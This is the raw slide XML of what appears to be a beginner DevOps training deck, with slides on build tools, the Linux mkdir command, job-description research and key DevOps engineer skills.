      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2272" name="Google Shape;2272;p370"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389400" y="830450"/>
            <a:ext cx="8520600" cy="92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Java Application Build Tools</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2277" name="Google Shape;2277;p371"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="1864"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="174400" y="825975"/>
            <a:ext cx="8795199" cy="3320074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="420450"/>
            <a:ext cx="8520600" cy="4148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4000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I want everyone to think like a DevOps Engineer for 3/4 months now.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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6" name="Shape 2286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2287" name="Google Shape;2287;p373"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="420450"/>
            <a:ext cx="8520600" cy="44607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800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A DevOps Engineer should be able to install almost any kind of apps (node/python/ruby) on local or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prod servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Should have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393065" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393065" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Servers</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393065" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393065" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393065" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database (SQL/NoSQL)</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393065" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="38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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to create a directory in linux ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="1161750"/>
            <a:ext cx="81702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4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>mkdir </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;directoryName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>mkdir </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>oklabs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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p374"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="420450"/>
            <a:ext cx="8520600" cy="35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800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A DevOps Engineer should have knowledge of how to</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup Agile Tools</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup CI/CD Pipelines</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AWS Cloud Provider</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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375"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922500" y="1284875"/>
            <a:ext cx="7299000" cy="34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rgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You should learn about</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Role &amp; Responsibilities</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Skills and  Capabilities</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>About the company</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qualifications</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2298" name="Google Shape;2298;p375"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442200" y="580500"/>
            <a:ext cx="8259600" cy="65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en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learn Lot of JD from Job Portals like linkedin etc</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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376"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2477">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key skills for DevOps engineers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3577">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2304" name="Google Shape;2304;p376"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38139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2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Build tools to reduce occurrences of errors and improve customer experience</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Perform root cause analysis for production errors</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Investigate and resolve technical issues</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Develop scripts to automate visualization (Python/NodeJs/Ruby)</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Design procedures for system troubleshooting and maintenance</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Working knowledge of databases and SQL</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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377"/>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2477">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key skills for DevOps engineers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3577">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2310" name="Google Shape;2310;p377"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38139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2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Excellent technical skills ( Linux / Docker / Jenkins / Git / SQL / AWS / GCP etc )</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
